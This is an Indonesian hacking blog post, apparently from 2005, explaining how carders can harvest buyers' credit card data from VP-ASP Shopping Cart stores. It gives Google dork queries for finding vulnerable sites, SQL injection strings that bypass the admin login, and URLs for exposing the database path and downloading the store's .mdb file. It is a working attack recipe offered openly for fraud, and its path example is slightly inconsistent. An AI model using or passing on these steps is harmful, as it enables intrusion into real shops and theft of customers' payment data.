Memanen Data Kartu Kredit Dari VP-ASP Shopping Cart


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Wednesday, August 17th, 2005
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Artikel ini akan membahas tentang celah keamanan pada VP-ASP Shopping Cart (vpasp.com) yang merupakan produk CMS toko online dari Rocksalt International Pty Ltd. Pengguna CMS ini cukup banyak. Maklum, fitur-fiturnya memang sesuai dengan harga yang ditawarkan (idiih.. jadi berbau promosi nich… ^^). Celah keamanan yang akan dibahas memungkinkan carder untuk memanen data-data sensitif pembeli, termasuk nomor-nomor kartu kredit yang digunakan untuk bertransaksi.

Selamat menikmati :)

Mencari Target Dengan Google Hacking

Ketik cobalah salah satu kata kunci berikut pada mesin pencari Google:

  • allinurl:shopadmin.asp
  • allinurl:vp-asp

SQL Injection

Misalnya target Anda dari hasil pencarian Google adalah:

http://www.spyrozone.net/shopadmin.asp

Cobalah mengakses halaman tersebut. Anda akan diminta untuk memasukkan username dan password. Cobalah kedua account berikut:

  • Username: ‘or”=’
    Password: ‘or”=’
  • Username: admin
    Password: ‘or”=’

Jika berhasil, Anda kini memiliki kontrl penuh terhadap CMS ;)

Download Database

Sekarang, kita akan memanfaatkan celah keamanan lain untuk mendapatkan informasi-informasi sensitif. Cobalah mengakses shopdbtest.asp. Karen atadi targetnya www.spyrozone.net, maka ketik pada URL:

http://www.spyrozone.net/shopdbtest.asp

Akan tampil variabel-variabel sensitif. Anda cukup memperhaikan 2 variabel yang paling menarik, yaitu:

  • xDatabase
  • xDblocation

Misalnya nilai pada:

  • xDatabase = spyrodatabase
  • xDblocation = spyrokid

maka file databasenya terletak pada folder /spyro/ dengan nama spyrodatabase.mdb. Untuk mendownloadnya, ketik URL:

http://www.spyrozone.net/spyro/spyrodatabase.mdb

Bukalah file spyrodatabase.mdb dengan Microsoft Access untuk melihat isi databasenya.

Sekian, semoga bermanfaat ;)


//E.O.F